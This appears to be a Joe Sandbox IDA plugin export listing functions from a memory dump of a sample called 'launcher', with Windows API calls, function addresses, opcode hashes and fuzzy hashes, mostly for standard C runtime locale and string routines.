Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: Find$CloseFile$AllocFirstHeapNext
String ID:
API String ID: 2701053895-0
Opcode ID: 2fd01911e9b22049da32a82c02c1ef17139c1d72cc56bea92db339156435d812
Instruction ID: 70663d6cd8906184462c68f39f95951002ff838c8037bab76062052cd5788576
Opcode Fuzzy Hash: 2fd01911e9b22049da32a82c02c1ef17139c1d72cc56bea92db339156435d812
Instruction Fuzzy Hash: 01513775906218AFDF249F2C9C85BBE77F9DF86315F1841D9F84893241EB308E4A9B60

Function 00B51840 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00B4C16A: GetLastError.KERNEL32(?,?,00B45495,00B68E38,0000000C), ref: 00B4C16E
Part of subcall function 00B4C16A: SetLastError.KERNEL32(00000000), ref: 00B4C210

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B51894

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: d8579dc7037bb043c7e88b1dedef75d64e27689d9354cc865bf51f734e941f34
Instruction ID: 5a854bfe016631250351d3edcca8fcfabd41ee0317b8699bbce526739cb01478
Opcode Fuzzy Hash: d8579dc7037bb043c7e88b1dedef75d64e27689d9354cc865bf51f734e941f34
Instruction Fuzzy Hash: EA217F72611206ABDB289A29DC42BBA77E8EF04716B1044FAFD02D6181EB74AD489A50

Function 00B43FB2 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

0, xrefs: 00B44136

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 73b0adabba5522e74bc0e9ad0ca44b4aed97f51b22a87ebf18cd37f6f048f603
Instruction ID: 86bdb718fa59f8c7c58e1549cebedabe8e606d428fbd2b989b5687f2527e18b7
Opcode Fuzzy Hash: 73b0adabba5522e74bc0e9ad0ca44b4aed97f51b22a87ebf18cd37f6f048f603
Instruction Fuzzy Hash: E5B1CD3090060A8BCB24CE68C995BBEBBF1EF11300F14469DE692A7781C7719F75EB51

Function 00B514D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B4C16A: GetLastError.KERNEL32(?,?,00B45495,00B68E38,0000000C), ref: 00B4C16E
Part of subcall function 00B4C16A: SetLastError.KERNEL32(00000000), ref: 00B4C210

EnumSystemLocalesW.KERNEL32(00B51580,00000001,00000000,?,-00000050,?,00B51363,00000000,-00000002,00000000,?,00000055,?), ref: 00B5154A

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 07554345b69d43bff062e3aa2356d2a1bd95d0c52f78fdb9fd27c88ad312921e
Instruction ID: e3e4a06c765c5a54ec21120bd1fe124b7b8a7d322240a9a470f11ce217689c55
Opcode Fuzzy Hash: 07554345b69d43bff062e3aa2356d2a1bd95d0c52f78fdb9fd27c88ad312921e
Instruction Fuzzy Hash: E911C2362007015FDB189F3D98A1BBABBD1FB90769B1448ADE98787B40E771A946CB40

Function 00B51960 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00B4C16A: GetLastError.KERNEL32(?,?,00B45495,00B68E38,0000000C), ref: 00B4C16E
Part of subcall function 00B4C16A: SetLastError.KERNEL32(00000000), ref: 00B4C210

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B519B4

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: e1b0cfc153c497c76068fd542f8d01fa000c5de9d7ab957c8e6059c2b7b2aafa
Instruction ID: 4be5cee5c52e4885507afc3fd7012e014e42e2d1cafed41c3ab3c118c7d5dc02
Opcode Fuzzy Hash: e1b0cfc153c497c76068fd542f8d01fa000c5de9d7ab957c8e6059c2b7b2aafa
Instruction Fuzzy Hash: EE11A032611206ABDB14EB6CDC52BBA77ECEF08715B1045FAE902D7181EB78EE099750

Function 00B51B0D Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00B4C16A: GetLastError.KERNEL32(?,?,00B45495,00B68E38,0000000C), ref: 00B4C16E
Part of subcall function 00B4C16A: SetLastError.KERNEL32(00000000), ref: 00B4C210

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00B5179C,00000000,00000000,?), ref: 00B51B39

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: e77007e1501f0b67496062945d32b56a1da22313513838874a3d9f52ed342692
Instruction ID: b646b3e73a213fb76e02da5b52c175fe4d2e2fe33318697a4891bb5f7209b513
Opcode Fuzzy Hash: e77007e1501f0b67496062945d32b56a1da22313513838874a3d9f52ed342692
Instruction Fuzzy Hash: BE01F932710112ABDB2C5B688C45BBA37E8EF40755F154CE9ED06A3180FAB4FE45C6A0

Function 00B517D3 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B4C16A: GetLastError.KERNEL32(?,?,00B45495,00B68E38,0000000C), ref: 00B4C16E
Part of subcall function 00B4C16A: SetLastError.KERNEL32(00000000), ref: 00B4C210

EnumSystemLocalesW.KERNEL32(00B51840,00000001,?,?,-00000050,?,00B5132B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00B5181D

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: ab8bc3550dd6d18e8584f65366e6b20709ee72690eae12cf3785679895dc49a3
Instruction ID: 953f4744cda4789cb3548487b75aec3efd1f9767bfdf010ec82258f1002d85d1
Opcode Fuzzy Hash: ab8bc3550dd6d18e8584f65366e6b20709ee72690eae12cf3785679895dc49a3
Instruction Fuzzy Hash: E9F0C2362003045FDB245F7DD881B6A7BD1EB81769F0588ADFD458B690D6B19D42C650

Function 00B4D1BD Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B480E1: EnterCriticalSection.KERNEL32(?,?,00B4C5F8,?,00B69290,00000008,00B4C4EA,?,?,?), ref: 00B480F0

EnumSystemLocalesW.KERNEL32(00B4D1B0,00000001,00B69310,0000000C,00B4CB11,-00000050), ref: 00B4D1F5

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 44361380523b579819c30623b5e65aee3d12a0e2195add9fc0f682ffe36d7f68
Instruction ID: bf1c2051ffcadd4f091981b1ee895b72eeaf6b73eca8e42fac91a8efb0191d3f
Opcode Fuzzy Hash: 44361380523b579819c30623b5e65aee3d12a0e2195add9fc0f682ffe36d7f68
Instruction Fuzzy Hash: B0F0C472A04204AFDB10EFA8E842B99B7F0EB55721F1081AAF4119B2E0DBB95A409F55

Function 00B51915 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B4C16A: GetLastError.KERNEL32(?,?,00B45495,00B68E38,0000000C), ref: 00B4C16E
Part of subcall function 00B4C16A: SetLastError.KERNEL32(00000000), ref: 00B4C210

EnumSystemLocalesW.KERNEL32(00B51960,00000001,?,?,?,00B51385,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00B5194C

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: cb8932fe40e61cd2815169f2d0c2545bc4afc74176d2dde6e41a49e90814388a
Instruction ID: afb65621c353ae81f9839b64699e25f5c1fabf404e9b638d5887f4cc1f492e11
Opcode Fuzzy Hash: cb8932fe40e61cd2815169f2d0c2545bc4afc74176d2dde6e41a49e90814388a
Instruction Fuzzy Hash: B3F0EC3530020557CB049F3DDC657667FE4EFC1B51F0644D9EE058B151C6759947C790

Function 00B4CC15 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00B46E33,?,20001004,00000000,00000002,?,?,00B45D3D), ref: 00B4CC49

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 0e6ff53d4f3b52939d38b5f07d22084ace14a2b5df09c217dea51ee5b06775f4
Instruction ID: 4faba1422f08f6815eb11108a3fad37ba420b06b7a8bf3ab3b0abcb13b3dde92
Opcode Fuzzy Hash: 0e6ff53d4f3b52939d38b5f07d22084ace14a2b5df09c217dea51ee5b06775f4
Instruction Fuzzy Hash: 17E04F3150262CBBCF162F60ED04E9E3F56EF44B50F044061FD0966261CB769E21BBD4

Function 00B3F8DD Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000FA00), ref: 00B3F8E2

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 33d0749e6e150f557f1370275a14db3f5770372d342164c4afdfec3a1983c9b7
Instruction ID: 9e2e2d1f5ef6f1d3ae406b01e43bc825674a8dd62eb1423dddfb355135cd74c4
Opcode Fuzzy Hash: 33d0749e6e150f557f1370275a14db3f5770372d342164c4afdfec3a1983c9b7
Instruction Fuzzy Hash:

Function 00B4D8E0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00B4D8E0

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: a0b7fe5128d85120ef2465e2e2dc2245d899e4c1234a9c8e7f942e4cdab9471b
Instruction ID: 716f0d7638932974067c91def85557c56589bb5cf471d210a6cf1b8c6552fbff
Opcode Fuzzy Hash: a0b7fe5128d85120ef2465e2e2dc2245d899e4c1234a9c8e7f942e4cdab9471b
Instruction Fuzzy Hash: 84A00170B016028B97408F36AA192093AA9EA45AD17058169E849C72A4EEB89854AF85

Function 00B5AAE2 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(02C7EDA0,02C7EDA0,00000000,7FFFFFFF,?,00B5AACD,02C7EDA0,02C7EDA0,00000000,02C7EDA0,?,?,?,?,02C7EDA0,00000000), ref: 00B5AB88
__alloca_probe_16.LIBCMT ref: 00B5AC43
__alloca_probe_16.LIBCMT ref: 00B5ACD2
__freea.LIBCMT ref: 00B5AD1D
__freea.LIBCMT ref: 00B5AD23
__freea.LIBCMT ref: 00B5AD59
__freea.LIBCMT ref: 00B5AD5F
__freea.LIBCMT ref: 00B5AD6F

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 3882b8a66954d979d8799d3e67467dd21fadec0b967466e3732eae9a110292ca
Instruction ID: 6003c4858efcb42f638bd79b9eb4d8a01db44e6be7239b2b2ad2566964d14470
Opcode Fuzzy Hash: 3882b8a66954d979d8799d3e67467dd21fadec0b967466e3732eae9a110292ca
Instruction Fuzzy Hash: 9171193290020A6BDF21AE548C91FAF77FAEF45712F2402E5ED04B7292E775DD098792

Function 00B3FE29 Relevance: 12.2, APIs: 8, Instructions: 177COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00B3FE70
__alloca_probe_16.LIBCMT ref: 00B3FE9C
MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00B3FEDB
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B3FEF8
LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B3FF37
__alloca_probe_16.LIBCMT ref: 00B3FF54
LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00B3FF96
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00B3FFB9

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 5962461bc6b643a4ecf65e971aab4949ee5d685183f275d13437738ff4a18f41
Instruction ID: 6b211f67366e37930afd93bab41f043e1d953b388da31a75694ac20f2225ce8d
Opcode Fuzzy Hash: 5962461bc6b643a4ecf65e971aab4949ee5d685183f275d13437738ff4a18f41
Instruction Fuzzy Hash: B0518872A0121BABEF205F60CC45FBA7BE9EF41754F2444B9FD14EA1A0DB748D149B60

Function 00B4EE76 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00B4EEFC

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
Instruction ID: bee54ddb00b069e3ec3c16a4f37ca49fe2bdd600b9ef3c824a8d2345d0d1f40d
Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
Instruction Fuzzy Hash: 1DB15472A00256AFEB118F68CC82BBEBBF5EF55310F1441E5E954AB382D674DE01D7A0

Function 00B40D40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00B40D77
___except_validate_context_record.LIBVCRUNTIME ref: 00B40D7F
_ValidateLocalCookies.LIBCMT ref: 00B40E08
__IsNonwritableInCurrentImage.LIBCMT ref: 00B40E33
_ValidateLocalCookies.LIBCMT ref: 00B40E88

Strings

csm, xrefs: 00B40E1D

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 982585d3255ae6566e0d83a259f2d377ced3f8aa4facbf649eea0c3730972da3
Instruction ID: b4c3e2027bfed7b3ed7c39d4143a0959693d329d4588e51cf948fff325433cb5
Opcode Fuzzy Hash: 982585d3255ae6566e0d83a259f2d377ced3f8aa4facbf649eea0c3730972da3
Instruction Fuzzy Hash: 4B41A330E10218ABCF10EF68C884A9EBBF5EF44314F1485E5EA145B292D735EB15DB91

Function 00B40080 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B40086
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00B40094
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00B400A5

Strings

GetTempPath2W, xrefs: 00B4009A
GetSystemTimePreciseAsFileTime, xrefs: 00B4008E
kernel32.dll, xrefs: 00B40081

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
